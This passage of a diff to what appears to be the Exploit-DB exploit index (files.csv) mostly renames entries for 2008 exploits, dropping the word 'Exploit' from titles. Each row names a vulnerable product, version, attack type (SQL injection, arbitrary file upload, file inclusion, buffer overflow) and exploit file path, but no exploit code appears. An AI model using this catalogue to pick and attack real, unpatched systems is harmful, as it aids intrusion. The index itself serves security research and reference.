Inclusion",2008-05-01,"Khashayar Fereidani",php,webapps,0 5529,platforms/php/webapps/5529.txt,"vlbook 1.21 - (Cross-Site Scripting / Local File Inclusion) Multiple Vulnerabilities",2008-05-01,"Khashayar Fereidani",php,webapps,0 -5530,platforms/windows/remote/5530.html,"Microsoft Works 7 - WkImgSrv.dll ActiveX Remote Buffer Overflow Exploit",2008-05-02,lhoang8500,windows,remote,0 +5530,platforms/windows/remote/5530.html,"Microsoft Works 7 - WkImgSrv.dll ActiveX Remote Buffer Overflow",2008-05-02,lhoang8500,windows,remote,0 5531,platforms/php/webapps/5531.txt,"Open Auto Classifieds 1.4.3b - SQL Injection",2008-05-02,InjEctOr5,php,webapps,0 5532,platforms/php/webapps/5532.txt,"ItCMS 1.9 - (boxpop.php) Remote Code Execution",2008-05-02,Cod3rZ,php,webapps,0 5533,platforms/php/webapps/5533.txt,"BlogMe PHP - 'comments.php id' SQL Injection",2008-05-03,His0k4,php,webapps,0 @@ -5227,7 +5228,7 @@ id,file,description,date,author,platform,type,port 5597,platforms/php/webapps/5597.pl,"Battle.net Clan Script 1.5.x - SQL Injection",2008-05-12,Stack,php,webapps,0 5598,platforms/php/webapps/5598.txt,"Mega File Hosting Script 1.2 - (fid) SQL Injection",2008-05-12,TurkishWarriorr,php,webapps,0 5599,platforms/php/webapps/5599.txt,"PHP Classifieds Script 05122008 - SQL Injection",2008-05-12,InjEctOr5,php,webapps,0 -5600,platforms/php/webapps/5600.php,"CMS Made Simple 1.2.4 - (FileManager module) File Upload Exploit",2008-05-12,EgiX,php,webapps,0 +5600,platforms/php/webapps/5600.php,"CMS Made Simple 1.2.4 - (FileManager module) File Upload",2008-05-12,EgiX,php,webapps,0 5601,platforms/php/webapps/5601.pl,"Advanced Image Hosting (AIH) 2.1 - SQL Injection",2008-05-12,Stack,php,webapps,0 5602,platforms/php/webapps/5602.txt,"AJ HYIP ACME - 'topic_detail.php id' SQL Injection",2008-05-12,InjEctOr5,php,webapps,0 5603,platforms/php/webapps/5603.txt,"EQDKP 1.3.2f - (user_id) Authentication Bypass (PoC)",2008-05-13,vortfu,php,webapps,0 @@ -5245,7 +5246,7 @@ id,file,description,date,author,platform,type,port 5615,platforms/php/webapps/5615.txt,"AS-GasTracker 1.0.0 - Insecure Cookie Handling",2008-05-14,t0pP8uZz,php,webapps,0 5616,platforms/php/webapps/5616.txt,"ActiveKB 1.5 - Insecure Cookie Handling/Arbitrary Admin Access",2008-05-14,t0pP8uZz,php,webapps,0 5617,platforms/php/webapps/5617.txt,"Internet PhotoShow (Special Edition) - Insecure Cookie Handling",2008-05-14,t0pP8uZz,php,webapps,0 -5618,platforms/php/webapps/5618.txt,"La-Nai CMS 1.2.16 - 'FCKeditor' Arbitrary File Upload Exploit",2008-05-14,EgiX,php,webapps,0 +5618,platforms/php/webapps/5618.txt,"La-Nai CMS 1.2.16 - 'FCKeditor' Arbitrary File Upload",2008-05-14,EgiX,php,webapps,0 5619,platforms/windows/remote/5619.html,"Microsoft Internet Explorer - (Print Table of Links) Cross-Zone Scripting (PoC)",2008-05-14,"Aviv Raff",windows,remote,0 5620,platforms/php/webapps/5620.txt,"rgboard 3.0.12 - (Remote File Inclusioni / Cross-Site Scripting) Multiple Vulnerabilities",2008-05-14,e.wiZz!,php,webapps,0 5621,platforms/php/webapps/5621.txt,"Kostenloses Linkmanagementscript - (page_to_include) Remote File Inclusion",2008-05-14,HaCkeR_EgY,php,webapps,0 @@ -5254,14 +5255,14 @@ id,file,description,date,author,platform,type,port 5624,platforms/php/webapps/5624.txt,"newsmanager 2.0 - (Remote File Inclusion / File Disclosure / SQL Injection / pb) Multiple Vulnerabilities",2008-05-15,GoLd_M,php,webapps,0 5625,platforms/windows/local/5625.c,"Symantec Altiris Client Service 6.8.378 - Privilege Escalation",2008-05-15,"Alex Hernandez",windows,local,0 5626,platforms/php/webapps/5626.txt,"68 Classifieds 4.0 - (category.php cat) SQL Injection",2008-05-15,HaCkeR_EgY,php,webapps,0 -5627,platforms/php/webapps/5627.pl,"Pet Grooming Management System 2.0 - Arbitrary Add-Admin Exploit",2008-05-15,t0pP8uZz,php,webapps,0 +5627,platforms/php/webapps/5627.pl,"Pet Grooming Management System 2.0 - Arbitrary Add Admin",2008-05-15,t0pP8uZz,php,webapps,0 5628,platforms/php/webapps/5628.txt,"RantX 1.0 - Insecure Admin Authentication",2008-05-15,t0pP8uZz,php,webapps,0 5629,platforms/php/webapps/5629.txt,"Web Slider 0.6 - Insecure Cookie/Authentication Handling",2008-05-15,t0pP8uZz,php,webapps,0 5630,platforms/php/webapps/5630.txt,"Multi-Page Comment System 1.1.0 - Insecure Cookie Handling",2008-05-15,t0pP8uZz,php,webapps,0 5631,platforms/php/webapps/5631.txt,"IMGallery 2.5 - Multiple SQL Injections",2008-05-15,cOndemned,php,webapps,0 5632,platforms/linux/remote/5632.rb,"Debian and Derivatives OpenSSL 0.9.8c-1<= 0.9.8g-9 - Predictable PRNG Brute Force SSH Exploit (Ruby)",2008-05-16,L4teral,linux,remote,22 5633,platforms/asp/webapps/5633.pl,"StanWeb.CMS - (default.asp id) SQL Injection",2008-05-16,JosS,asp,webapps,0 -5634,platforms/php/webapps/5634.htm,"Zomplog 3.8.2 - (newuser.php) Arbitrary Add Admin Exploit",2008-05-16,ArxWolf,php,webapps,0 +5634,platforms/php/webapps/5634.htm,"Zomplog 3.8.2 - (newuser.php) Arbitrary Add Admin",2008-05-16,ArxWolf,php,webapps,0 5635,platforms/php/webapps/5635.pl,"Archangel Weblog 0.90.02 - (post_id) SQL Injection",2008-05-16,Stack,php,webapps,0 5636,platforms/php/webapps/5636.txt,"Zomplog 3.8.2 - (force_download.php) File Disclosure",2008-05-16,Stack,php,webapps,0 5637,platforms/php/webapps/5637.txt,"WR-Meeting 1.0 - (msnum) Local File Disclosure",2008-05-17,Cr@zy_King,php,webapps,0 @@ -5272,12 +5273,12 @@ id,file,description,date,author,platform,type,port 5642,platforms/php/webapps/5642.txt,"TAGWORX.CMS - Multiple SQL Injections",2008-05-18,dun,php,webapps,0 5643,platforms/php/webapps/5643.txt,"Ajax Framework - 'lang' Local File Inclusion",2008-05-18,dun,php,webapps,0 5644,platforms/php/webapps/5644.txt,"lulieblog 1.2 - Multiple Vulnerabilities",2008-05-18,Cod3rZ,php,webapps,0 -5645,platforms/php/webapps/5645.txt,"AlkalinePHP 0.77.35 - (adduser.php) Arbitrary Add-Admin",2008-05-18,t0pP8uZz,php,webapps,0 +5645,platforms/php/webapps/5645.txt,"AlkalinePHP 0.77.35 - (adduser.php) Arbitrary Add Admin",2008-05-18,t0pP8uZz,php,webapps,0 5646,platforms/php/webapps/5646.txt,"easycms 0.4.2 - Multiple Vulnerabilities",2008-05-18,t0pP8uZz,php,webapps,0 5647,platforms/php/webapps/5647.txt,"GNU/Gallery 1.1.1.0 - 'admin.php' Local File Inclusion",2008-05-18,t0pP8uZz,php,webapps,0 -5648,platforms/php/webapps/5648.pl,"MeltingIce File System 1.0 - Arbitrary Add-User Exploit",2008-05-18,t0pP8uZz,php,webapps,0 -5649,platforms/php/webapps/5649.pl,"PHP AGTC-Membership System 1.1a - Arbitrary Add-Admin Exploit",2008-05-18,t0pP8uZz,php,webapps,0 -5650,platforms/php/webapps/5650.pl,"MyPicGallery 1.0 - Arbitrary Add-Admin Exploit",2008-05-18,t0pP8uZz,php,webapps,0 +5648,platforms/php/webapps/5648.pl,"MeltingIce File System 1.0 - Arbitrary Add User Exploit",2008-05-18,t0pP8uZz,php,webapps,0 +5649,platforms/php/webapps/5649.pl,"PHP AGTC-Membership System 1.1a - Arbitrary Add Admin",2008-05-18,t0pP8uZz,php,webapps,0 +5650,platforms/php/webapps/5650.pl,"MyPicGallery 1.0 - Arbitrary Add Admin",2008-05-18,t0pP8uZz,php,webapps,0 5651,platforms/php/webapps/5651.txt,"microssys CMS 1.5 - Remote File Inclusion",2008-05-19,Raz0r,php,webapps,0 5652,platforms/php/webapps/5652.pl,"AlkalinePHP 0.80.00 Beta - (thread.php id) SQL Injection",2008-05-19,Stack,php,webapps,0 5653,platforms/php/webapps/5653.php,"MercuryBoard 1.1.5 - 'login.php' Blind SQL Injection",2008-05-19,EgiX,php,webapps,0 @@ -5301,10 +5302,10 @@ id,file,description,date,author,platform,type,port 5671,platforms/php/webapps/5671.txt,"PHPRaider 1.0.7 - (PHPbb3.functions.php) Remote File Inclusion",2008-05-24,Kacak,php,webapps,0 5672,platforms/php/webapps/5672.txt,"plusphp url shortening software 1.6 - Remote File Inclusion",2008-05-25,DR.TOXIC,php,webapps,0 5673,platforms/php/webapps/5673.txt,"Xomol CMS 1.2 - Login Bypass / Local File Inclusion",2008-05-25,DNX,php,webapps,0 -5674,platforms/php/webapps/5674.txt,"RoomPHPlanning 1.5 - Arbitrary Add Admin User",2008-05-26,Stack,php,webapps,0 +5674,platforms/php/webapps/5674.txt,"RoomPHPlanning 1.5 - Arbitrary Add Admin",2008-05-26,Stack,php,webapps,0 5675,platforms/php/webapps/5675.txt,"RoomPHPlanning 1.5 - Multiple SQL Injections",2008-05-26,"Virangar Security",php,webapps,0 5676,platforms/php/webapps/5676.txt,"CMS MAXSITE 1.10 - (category) SQL Injection",2008-05-26,Tesz,php,webapps,0 -5677,platforms/php/webapps/5677.txt,"RevokeBB 1.0 RC11 - (search) SQL Injection",2008-05-27,The:Paradox,php,webapps,0 +5677,platforms/php/webapps/5677.txt,"RevokeBB 1.0 RC11 - 'Search' SQL Injection",2008-05-27,The:Paradox,php,webapps,0 5678,platforms/php/webapps/5678.txt,"CKGold Shopping Cart 2.5 - (category_id) SQL Injection",2008-05-27,Cr@zy_King,php,webapps,0 5679,platforms/multiple/dos/5679.php,"PHP 5.2.6 - sleep() Local Memory Exhaust Exploit",2008-05-27,Gogulas,multiple,dos,0 5680,platforms/php/webapps/5680.txt,"OtomiGen.x 2.2 - 'lang' Local File Inclusion",2008-05-27,Saime,php,webapps,0 @@ -5314,7 +5315,7 @@ id,file,description,date,author,platform,type,port 5684,platforms/php/webapps/5684.txt,"Joomla Component Artist (idgalery) - SQL Injection",2008-05-28,Cr@zy_King,php,webapps,0 5685,platforms/php/webapps/5685.txt,"FlashBlog - (articulo_id) SQL Injection",2008-05-28,HER0,php,webapps,0 5687,platforms/windows/dos/5687.txt,"Adobe Acrobat Reader 8.1.2 - Malformed PDF Remote Denial of Service (PoC)",2008-05-29,securfrog,windows,dos,0 -5688,platforms/php/webapps/5688.php,"SyntaxCMS 1.3 - 'FCKeditor' Arbitrary File Upload Exploit",2008-05-29,Stack,php,webapps,0 +5688,platforms/php/webapps/5688.php,"SyntaxCMS 1.3 - 'FCKeditor' Arbitrary File Upload",2008-05-29,Stack,php,webapps,0 5689,platforms/php/webapps/5689.txt,"AirvaeCommerce 3.0 - 'pid' SQL Injection",2008-05-29,QTRinux,php,webapps,0 5690,platforms/php/webapps/5690.txt,"PicoFlat CMS 0.5.9 (Windows) - Local File Inclusion",2008-05-29,gmda,php,webapps,0 5691,platforms/php/webapps/5691.php,"CMS from Scratch 1.1.3 - 'FCKeditor' Arbitrary File Upload",2008-05-29,EgiX,php,webapps,0 @@ -5323,10 +5324,10 @@ id,file,description,date,author,platform,type,port 5694,platforms/windows/remote/5694.cpp,"ASUS DPC Proxy 2.0.0.16/19 - Remote Buffer Overflow",2008-05-29,Heretic2,windows,remote,623 5695,platforms/windows/remote/5695.cpp,"Now SMS/Mms Gateway 5.5 - Remote Buffer Overflow",2008-05-29,Heretic2,windows,remote,8800 5696,platforms/php/webapps/5696.pl,"PHP Booking Calendar 10 d - SQL Injection",2008-05-29,Stack,php,webapps,0 -5697,platforms/php/webapps/5697.php,"PHP Booking Calendar 10 d - 'FCKeditor' Arbitrary File Upload Exploit",2008-05-29,Stack,php,webapps,0 +5697,platforms/php/webapps/5697.php,"PHP Booking Calendar 10 d - 'FCKeditor' Arbitrary File Upload",2008-05-29,Stack,php,webapps,0 5698,platforms/php/webapps/5698.txt,"HiveMaker Professional 1.0.2 - 'cid' SQL Injection",2008-05-30,K-159,php,webapps,0 5699,platforms/php/webapps/5699.txt,"PsychoStats 2.3.3 - Multiple SQL Injections",2008-05-31,Mr.SQL,php,webapps,0 -5700,platforms/php/webapps/5700.htm,"CMSimple 3.1 - Local File Inclusion / Arbitrary File Upload Exploit",2008-05-31,irk4z,php,webapps,0 +5700,platforms/php/webapps/5700.htm,"CMSimple 3.1 - Local File Inclusion / Arbitrary File Upload",2008-05-31,irk4z,php,webapps,0 5701,platforms/php/webapps/5701.txt,"Social Site Generator - (sgc_id) SQL Injection",2008-05-31,"DeAr Ev!L",php,webapps,0 5702,platforms/php/webapps/5702.txt,"Azuresites CMS - Multiple Vulnerabilities",2008-05-31,Lidloses_Auge,php,webapps,0 5703,platforms/php/webapps/5703.txt,"PHP Visit Counter 0.4 - (datespan) SQL Injection",2008-05-31,Lidloses_Auge,php,webapps,0 @@ -5342,9 +5343,9 @@ id,file,description,date,author,platform,type,port 5713,platforms/php/webapps/5713.txt,"ComicShout 2.8 - (news.php news_id) SQL Injection",2008-06-01,JosS,php,webapps,0 5714,platforms/php/webapps/5714.pl,"Joomla Component com_mycontent 1.1.13 - Blind SQL Injection",2008-06-01,His0k4,php,webapps,0 5715,platforms/php/webapps/5715.txt,"DesktopOnNet 3 Beta - Multiple Remote File Inclusion",2008-06-01,MK,php,webapps,0 -5716,platforms/php/webapps/5716.txt,"mebiblio 0.4.7 - (SQL Injection / File Upload / Cross-Site Scripting) Multiple Vulnerabilities",2008-06-01,"CWH Underground",php,webapps,0 +5716,platforms/php/webapps/5716.txt,"mebiblio 0.4.7 - (SQL Injection / Arbitrary File Upload / Cross-Site Scripting) Multiple Vulnerabilities",2008-06-01,"CWH Underground",php,webapps,0 5717,platforms/asp/webapps/5717.txt,"I-Pos Internet Pay Online Store 1.3 Beta - SQL Injection",2008-06-01,KnocKout,asp,webapps,0 -5718,platforms/windows/dos/5718.pl,"SecurityGateway 1.0.1 - 'username' Remote Buffer Overflow (PoC)",2008-06-01,securfrog,windows,dos,0 +5718,platforms/windows/dos/5718.pl,"SecurityGateway 1.0.1 - ''Username'' Remote Buffer Overflow (PoC)",2008-06-01,securfrog,windows,dos,0 5719,platforms/php/webapps/5719.pl,"Joomla Component JooBB 0.5.9 - Blind SQL Injection",2008-06-01,His0k4,php,webapps,0 5720,platforms/linux/remote/5720.py,"Debian and Derivatives OpenSSL 0.9.8c-1<= 0.9.8g-9 - Predictable PRNG Brute Force SSH Exploit (Python)",2008-06-01,"WarCat team",linux,remote,22 5721,platforms/php/webapps/5721.pl,"Joomla Component acctexp 0.12.x - Blind SQL Injection",2008-06-02,His0k4,php,webapps,0 @@ -5370,10 +5371,10 @@ id,file,description,date,author,platform,type,port 5743,platforms/php/webapps/5743.txt,"Joomla Component SimpleShop 3.4 - SQL Injection",2008-06-05,His0k4,php,webapps,0 5744,platforms/php/webapps/5744.txt,"Power Phlogger 2.2.5 - (css_str) SQL Injection",2008-06-05,MustLive,php,webapps,0 5745,platforms/php/webapps/5745.txt,"pSys 0.7.0.a - (shownews) SQL Injection",2008-06-05,anonymous,php,webapps,0 -5746,platforms/windows/remote/5746.html,"Black Ice Software Inc Barcode SDK - (BITiff.ocx) Remote Buffer Overflow Exploit (1)",2008-06-05,shinnai,windows,remote,0 -5747,platforms/windows/remote/5747.html,"Black Ice Software Inc Barcode SDK - (BITiff.ocx) Remote Buffer Overflow Exploit (2)",2008-06-05,shinnai,windows,remote,0 +5746,platforms/windows/remote/5746.html,"Black Ice Software Inc Barcode SDK - (BITiff.ocx) Remote Buffer Overflow (1)",2008-06-05,shinnai,windows,remote,0 +5747,platforms/windows/remote/5747.html,"Black Ice Software Inc Barcode SDK - (BITiff.ocx) Remote Buffer Overflow (2)",2008-06-05,shinnai,windows,remote,0 5748,platforms/php/webapps/5748.txt,"Joomla Component JoomlaDate - (user) SQL Injection",2008-06-05,His0k4,php,webapps,0 -5749,platforms/multiple/dos/5749.pl,"Asterisk - (SIP channel driver / in pedantic mode) Remote Crash Exploit",2008-06-05,"Armando Oliveira",multiple,dos,0 +5749,platforms/multiple/dos/5749.pl,"Asterisk - (SIP channel driver / in pedantic mode) Remote Crash",2008-06-05,"Armando Oliveira",multiple,dos,0 5750,platforms/windows/remote/5750.html,"Black Ice Software Inc Barcode SDK - 'BIDIB.ocx' Multiple Vulnerabilities",2008-06-05,shinnai,windows,remote,0 5751,platforms/windows/remote/5751.pl,"freeSSHd 1.2.1 - (Post-Authentication) Remote SEH Overflow",2008-06-06,ryujin,windows,remote,22 5752,platforms/php/webapps/5752.pl,"Joomla Component GameQ 4.0 - SQL Injection",2008-06-07,His0k4,php,webapps,0 @@ -5394,15 +5395,15 @@ id,file,description,date,author,platform,type,port 5767,platforms/php/webapps/5767.php,"Flux CMS 1.5.0 - (loadsave.php) Arbitrary File Overwrite",2008-06-09,EgiX,php,webapps,0 5768,platforms/php/webapps/5768.txt,"pNews 2.08 - (shownews) SQL Injection",2008-06-09,Cr@zy_King,php,webapps,0 5769,platforms/php/webapps/5769.pl,"Telephone Directory 2008 - Arbitrary Delete Contact Exploit",2008-06-09,Stack,php,webapps,0 -5770,platforms/php/webapps/5770.php,"Achievo 1.3.2 - 'FCKeditor' Arbitrary File Upload Exploit",2008-06-09,EgiX,php,webapps,0 +5770,platforms/php/webapps/5770.php,"Achievo 1.3.2 - 'FCKeditor' Arbitrary File Upload",2008-06-09,EgiX,php,webapps,0 5771,platforms/php/webapps/5771.txt,"ErfurtWiki R1.02b - (css) Local File Inclusion",2008-06-10,Unohope,php,webapps,0 5772,platforms/php/webapps/5772.txt,"DCFM Blog 0.9.4 - (comments) SQL Injection",2008-06-10,Unohope,php,webapps,0 5773,platforms/php/webapps/5773.txt,"yblog 0.2.2.2 - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities",2008-06-10,Unohope,php,webapps,0 5774,platforms/php/webapps/5774.txt,"Insanely Simple Blog 0.5 - (index) SQL Injection",2008-06-10,Unohope,php,webapps,0 5775,platforms/php/webapps/5775.txt,"ASPPortal Free Version (Topic_Id) - SQL Injection",2008-06-10,JosS,php,webapps,0 5776,platforms/php/webapps/5776.txt,"Experts 1.0.0 - (answer.php) SQL Injection",2008-06-10,"CWH Underground",php,webapps,0 -5777,platforms/windows/remote/5777.html,"Black Ice Software Annotation Plugin - 'BiAnno.ocx' Remote Buffer Overflow Exploit",2008-06-10,shinnai,windows,remote,0 -5778,platforms/windows/remote/5778.html,"Black Ice Software Annotation Plugin - (BiAnno.ocx) Buffer Overflow Exploit (2)",2008-06-10,shinnai,windows,remote,0 +5777,platforms/windows/remote/5777.html,"Black Ice Software Annotation Plugin - 'BiAnno.ocx' Remote Buffer Overflow",2008-06-10,shinnai,windows,remote,0 +5778,platforms/windows/remote/5778.html,"Black Ice Software Annotation Plugin - (BiAnno.ocx) Buffer Overflow (2)",2008-06-10,shinnai,windows,remote,0 5779,platforms/php/webapps/5779.txt,"syndeo CMS 2.6.0 - (Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities",2008-06-10,"CWH Underground",php,webapps,0 5780,platforms/asp/webapps/5780.txt,"ASP Download 1.03 - Arbitrary Change Administrator Account",2008-06-10,Zigma,asp,webapps,0 5781,platforms/asp/webapps/5781.txt,"Todd Woolums ASP News Management 2.2 - SQL Injection",2008-06-10,Bl@ckbe@rD,asp,webapps,0 @@ -5410,19 +5411,19 @@ id,file,description,date,author,platform,type,port 5783,platforms/php/webapps/5783.txt,"Yuhhu 2008 SuperStar - (board) SQL Injection",2008-06-10,RMx,php,webapps,0 5784,platforms/php/webapps/5784.txt,"FOG Forum 0.8.1 - Multiple Local File Inclusion",2008-06-11,"CWH Underground",php,webapps,0 5785,platforms/php/webapps/5785.txt,"eFiction 3.0 - (toplists.php list) SQL Injection",2008-06-11,Mr.SQL,php,webapps,0 -5786,platforms/php/webapps/5786.txt,"IPTBB 0.5.6 - Arbitrary Add-Admin Exploit",2008-06-11,"CWH Underground",php,webapps,0 +5786,platforms/php/webapps/5786.txt,"IPTBB 0.5.6 - Arbitrary Add Admin",2008-06-11,"CWH Underground",php,webapps,0 5787,platforms/php/webapps/5787.txt,"MycroCMS 0.5 - Blind SQL Injection",2008-06-11,"CWH Underground",php,webapps,0 5788,platforms/php/webapps/5788.txt,"Pooya Site Builder (PSB) 6.0 - Multiple SQL Injections",2008-06-11,BugReport.IR,php,webapps,0 5789,platforms/php/webapps/5789.pl,"JAMM CMS - 'id' Blind SQL Injection",2008-06-11,anonymous,php,webapps,0 -5790,platforms/multiple/remote/5790.txt,"SNMPv3 - HMAC Validation error Remote Authentication Bypass Exploit",2008-06-12,"Maurizio Agazzini",multiple,remote,161 +5790,platforms/multiple/remote/5790.txt,"SNMPv3 - HMAC Validation error Remote Authentication Bypass",2008-06-12,"Maurizio Agazzini",multiple,remote,161 5791,platforms/php/webapps/5791.txt,"gravity board x 2.0 Beta - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2008-06-12,"CWH Underground",php,webapps,0 5792,platforms/php/webapps/5792.txt,"Facil-CMS 0.1RC - Multiple Local File Inclusion",2008-06-12,"CWH Underground",php,webapps,0 -5793,platforms/windows/remote/5793.html,"muvee autoProducer 6.1 - (TextOut.dll) ActiveX Remote Buffer Overflow Exploit",2008-06-12,Nine:Situations:Group,windows,remote,0 +5793,platforms/windows/remote/5793.html,"muvee autoProducer 6.1 - (TextOut.dll) ActiveX Remote Buffer Overflow",2008-06-12,Nine:Situations:Group,windows,remote,0 5794,platforms/php/webapps/5794.pl,"Clever Copy 3.0 - 'results.php' SQL Injection",2008-06-12,anonymous,php,webapps,0 5795,platforms/windows/remote/5795.html,"XChat 2.8.7b - (URI Handler) Remote Code Execution (Internet Explorer 6/7'",2008-06-13,securfrog,windows,remote,0 5796,platforms/php/webapps/5796.php,"GLLCTS2 <= 4.2.4 - (login.php detail) SQL Injection",2008-06-12,TheDefaced,php,webapps,0 5797,platforms/php/webapps/5797.txt,"Butterfly ORGanizer 2.0.0 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2008-06-13,"CWH Underground",php,webapps,0 -5798,platforms/php/webapps/5798.pl,"WebChamado 1.1 - Arbitrary Add Admin Exploit",2008-06-13,"CWH Underground",php,webapps,0 +5798,platforms/php/webapps/5798.pl,"WebChamado 1.1 - Arbitrary Add Admin",2008-06-13,"CWH Underground",php,webapps,0 5799,platforms/php/webapps/5799.pl,"Mambo Component Galleries 1.0 - (aid) SQL Injection",2008-06-13,Houssamix,php,webapps,0 5800,platforms/php/webapps/5800.pl,"Butterfly ORGanizer 2.0.0 - Arbitrary Delete (Category/Account) Exploit",2008-06-13,Stack,php,webapps,0 5801,platforms/php/webapps/5801.txt,"Easy-Clanpage 3.0b1 - (section) Local File Inclusion",2008-06-13,Loader007,php,webapps,0 @@ -5467,13 +5468,13 @@ id,file,description,date,author,platform,type,port 5841,platforms/php/webapps/5841.txt,"ThaiQuickCart - (sLanguage) Local File Inclusion",2008-06-17,"CWH Underground",php,webapps,0 5842,platforms/php/webapps/5842.txt,"PHP Site Lock 2.0 - 'index.php' SQL Injection",2008-06-17,Mr.SQL,php,webapps,0 5843,platforms/windows/dos/5843.html,"P2P Foxy - Out of Memory Denial of Service",2008-06-17,Styxosaurus,windows,dos,0 -5844,platforms/php/webapps/5844.php,"FreeCMS.us 0.2 - 'FCKeditor' Arbitrary File Upload Exploit",2008-06-17,Stack,php,webapps,0 +5844,platforms/php/webapps/5844.php,"FreeCMS.us 0.2 - 'FCKeditor' Arbitrary File Upload",2008-06-17,Stack,php,webapps,0 5845,platforms/php/webapps/5845.txt,"MyShoutPro 1.2 - Final Insecure Cookie Handling",2008-06-17,Stack,php,webapps,0 5846,platforms/php/webapps/5846.txt,"eroCMS 1.4 - (index.php site) SQL Injection",2008-06-17,Mr.SQL,php,webapps,0 5847,platforms/php/webapps/5847.txt,"WebCalendar 1.0.4 - (includedir) Remote File Inclusion",2008-06-17,Cr@zy_King,php,webapps,0 5848,platforms/php/webapps/5848.txt,"traindepot 0.1 - (Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities",2008-06-18,"CWH Underground",php,webapps,0 5849,platforms/asp/webapps/5849.txt,"doITlive CMS 2.50 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2008-06-18,BugReport.IR,asp,webapps,0 -5850,platforms/php/webapps/5850.txt,"AspWebCalendar 2008 - Remote File Upload",2008-06-18,Alemin_Krali,php,webapps,0 +5850,platforms/php/webapps/5850.txt,"AspWebCalendar 2008 - Arbitrary File Upload",2008-06-18,Alemin_Krali,php,webapps,0 5851,platforms/windows/dos/5851.txt,"Visual Basic Enterprise Edition SP6 - vb6skit.dll Buffer Overflow (PoC)",2008-06-18,shinnai,windows,dos,0 5852,platforms/php/webapps/5852.txt,"netBIOS - 'shownews.php newsid' SQL Injection",2008-06-18,"security fears team",php,webapps,0 5853,platforms/php/webapps/5853.txt,"Maxtrade AIO 1.3.23 - (categori) SQL Injection",2008-06-18,HaCkeR_EgY,php,webapps,0 @@ -5503,14 +5504,14 @@ id,file,description,date,author,platform,type,port 5877,platforms/php/webapps/5877.txt,"jaxultrabb 2.0 - (Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities",2008-06-20,"CWH Underground",php,webapps,0 5878,platforms/php/webapps/5878.txt,"emuCMS 0.3 - 'cat_id' SQL Injection",2008-06-20,TurkishWarriorr,php,webapps,0 5879,platforms/php/webapps/5879.txt,"phpAuction - 'profile.php user_id' SQL Injection",2008-06-20,Mr.SQL,php,webapps,0 -5880,platforms/php/webapps/5880.txt,"sitexs CMS 0.1.1 - (File Upload / Cross-Site Scripting) Multiple Vulnerabilities",2008-06-21,"CWH Underground",php,webapps,0 +5880,platforms/php/webapps/5880.txt,"sitexs CMS 0.1.1 - (Arbitrary File Upload / Cross-Site Scripting) Multiple Vulnerabilities",2008-06-21,"CWH Underground",php,webapps,0 5881,platforms/php/webapps/5881.txt,"@CMS 2.1.1 - (readarticle.php article_id) SQL Injection",2008-06-21,Mr.SQL,php,webapps,0 5882,platforms/php/webapps/5882.txt,"eNews 0.1 - (delete.php) Arbitrary Delete Post",2008-06-21,"ilker Kandemir",php,webapps,0 5883,platforms/php/webapps/5883.txt,"PHP KnowledgeBase Script 2.4 - 'cat_id' SQL Injection",2008-06-21,"S.L TEAM",php,webapps,0 5884,platforms/php/webapps/5884.txt,"Aprox CMS Engine 5 (1.0.4) - Local File Inclusion",2008-06-21,SkyOut,php,webapps,0 5885,platforms/php/webapps/5885.pl,"Scientific Image DataBase 0.41 - Blind SQL Injection",2008-06-21,t0pP8uZz,php,webapps,0 -5886,platforms/php/webapps/5886.pl,"LaserNet CMS 1.5 - Arbitrary File Upload Exploit",2008-06-21,t0pP8uZz,php,webapps,0 -5887,platforms/php/webapps/5887.pl,"LE.CMS 1.4 - Arbitrary File Upload Exploit",2008-06-21,t0pP8uZz,php,webapps,0 +5886,platforms/php/webapps/5886.pl,"LaserNet CMS 1.5 - Arbitrary File Upload",2008-06-21,t0pP8uZz,php,webapps,0 +5887,platforms/php/webapps/5887.pl,"LE.CMS 1.4 - Arbitrary File Upload",2008-06-21,t0pP8uZz,php,webapps,0 5888,platforms/php/webapps/5888.txt,"CCLeague Pro 1.2 - Insecure Cookie Authentication",2008-06-21,t0pP8uZz,php,webapps,0 5889,platforms/php/webapps/5889.txt,"OFFL 0.2.6 - (teams.php fflteam) SQL Injection",2008-06-21,t0pP8uZz,php,webapps,0 5890,platforms/php/webapps/5890.txt,"AJ HYIP ACME - 'news.php id' SQL Injection",2008-06-21,"Hussin X",php,webapps,0 @@ -5529,7 +5530,7 @@ id,file,description,date,author,platform,type,port 5904,platforms/php/webapps/5904.txt,"Hedgehog-CMS 1.21 - 'header.php' Local File Inclusion",2008-06-22,CraCkEr,php,webapps,0 5905,platforms/php/webapps/5905.txt,"cmreams CMS 1.3.1.1 beta2 - (Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities",2008-06-22,CraCkEr,php,webapps,0 5906,platforms/php/webapps/5906.txt,"odars CMS 1.0.2 - Remote File Inclusion",2008-06-22,CraCkEr,php,webapps,0 -5907,platforms/php/webapps/5907.pl,"emuCMS 0.3 - 'FCKeditor' Arbitrary File Upload Exploit",2008-06-23,Stack,php,webapps,0 +5907,platforms/php/webapps/5907.pl,"emuCMS 0.3 - 'FCKeditor' Arbitrary File Upload",2008-06-23,Stack,php,webapps,0 5908,platforms/php/webapps/5908.txt,"HoMaP-CMS 0.1 - (index.php go) SQL Injection",2008-06-23,SxCx,php,webapps,0 5909,platforms/php/webapps/5909.pl,"BlogPHP 2.0 - Privilege Escalation (via SQL Injection)",2008-06-23,Cod3rZ,php,webapps,0 5910,platforms/php/webapps/5910.txt,"Ready2Edit - 'pages.php menuid' SQL Injection",2008-06-23,Mr.SQL,php,webapps,0 @@ -5544,8 +5545,8 @@ id,file,description,date,author,platform,type,port 5919,platforms/php/webapps/5919.txt,"mm chat 1.5 - (Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities",2008-06-23,CraCkEr,php,webapps,0 5920,platforms/php/webapps/5920.txt,"ourvideo CMS 9.5 - (Remote File Inclusion / Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities",2008-06-23,CraCkEr,php,webapps,0 5921,platforms/php/webapps/5921.txt,"cmsWorks 2.2 RC4 - (mod_root) Remote File Inclusion",2008-06-23,CraCkEr,php,webapps,0 -5922,platforms/php/webapps/5922.php,"cmsWorks 2.2 RC4 - 'FCKeditor' Arbitrary File Upload Exploit",2008-06-23,Stack,php,webapps,0 -5923,platforms/php/webapps/5923.pl,"Demo4 CMS 